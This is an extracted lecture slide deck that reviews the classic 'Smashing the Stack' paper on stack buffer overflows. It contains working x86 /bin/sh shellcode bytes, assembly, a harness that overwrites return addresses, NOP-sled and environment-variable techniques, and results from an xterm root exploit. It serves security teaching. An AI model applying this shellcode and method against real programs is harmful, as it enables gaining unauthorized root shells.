Smashing the Stack for Fun and Profit Review: Process memory organization The problem: Buffer overflows How to exploit the problem Implementing the Exploit Results Conclusion and discussion
Process Memory Organization
Process Memory Organization
Process Memory Organization
Function Calls
Function Calls
Buffer Overflows void function(char *str) { char buffer[8]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }
Buffer Overflows
Buffer Overflows
Buffer Overflows
Buffer Overflows
Buffer Overflows
Buffer Overflows
Buffer Overflows
Buffer Overflows
Modifying the Execution Flow void function() { char buffer1[4]; int *ret; ret = buffer1 + 8; (*ret) += 8; } void main() { int x = 0; function(); x = 1; printf("%d\n",x); }
Modifying the Execution Flow
Modifying the Execution Flow
Modifying the Execution Flow
Modifying the Execution Flow
Exploiting Overflows- Smashing the Stack Now we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it
Exploiting Overflows- Smashing the Stack Now we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it
Exploiting Overflows- Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!
Exploiting Overflows- Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!
Implementing the Exploit Writing and testing the code to spawn a shell Putting it all together- an example of smashing the stack Exploiting a real target program
Spawning a Shell #include <stdio.h> #include <stdlib.h> void main() { GDB char *name[2]; ASSEMBLY CODE name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); }
Spawning a Shell void main() {__asm__(" jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax GDB movl %esi,%ebx BINARY CODE leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx call -0x2f .string \"/bin/sh\" "); }
Spawning a Shell char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; This is just a array, but not a real string. O/w the \x00 will always marks the termination of the string.
Testing the Shellcode char shellcode[ ] = "\xeb\x2a\x5e…/bin/sh"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } In this example, we simply point the return address to the shell code char array, instead of using any string operation.
Testing the Shellcode
Testing the Shellcode
Putting it all Together char shellcode[]="\xeb\x1f\…. \xb0\x0b\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); }
Putting it all Together b/c we cannot write the buffer address into the large_string directly. So we use long_ptr to write them indirectly.
Putting it all Together
Putting it all Together
Putting it all Together
Putting it all Together
Putting it all Together Use 8 words (128-96=32 B) to overwrite b/c often we don’t know exactly where the ret address is, due to the variety of different machines/OSes. More advanced examples are available to find the stack pointer and thus more accurate overflow.
Exploiting a Real Program It’s easy to execute our attack when we have the source code What about when we don’t? How will we know what our return address should be?
How to find Shellcode Guess - time consuming - being wrong by 1 byte will lead to segmentation fault or invalid instruction
How to find Shellcode 2. Pad shellcode with NOP’s then guess - we don’t need to be exactly on - much more efficient
Summary ‘Smashing the stack’ works by injecting code into a program using a buffer overflow, and getting the program to jump to that code By exploiting a root program, user can call exec(“/bin/shell”) and gain root access
Summary Buffer overflow vulnerabilities are the most commonly exploited- account for more than half of all new security problems (CERT) Are relatively easy to exploit Many variations on stack smash- heap overflows, internet attacks, etc.
Small Buffer Overflows If the buffer is smaller than our shellcode, we will overwrite the return address with instructions instead of the address of our code Solution: place shellcode in an environment variable then overflow the buffer with the address of this variable in memory Can make environment variable as large as you want Only works if you have access to environment variables
Results: Hacking xterm Attempts Without NOP padding - With NOP padding 10 Using environment variable 1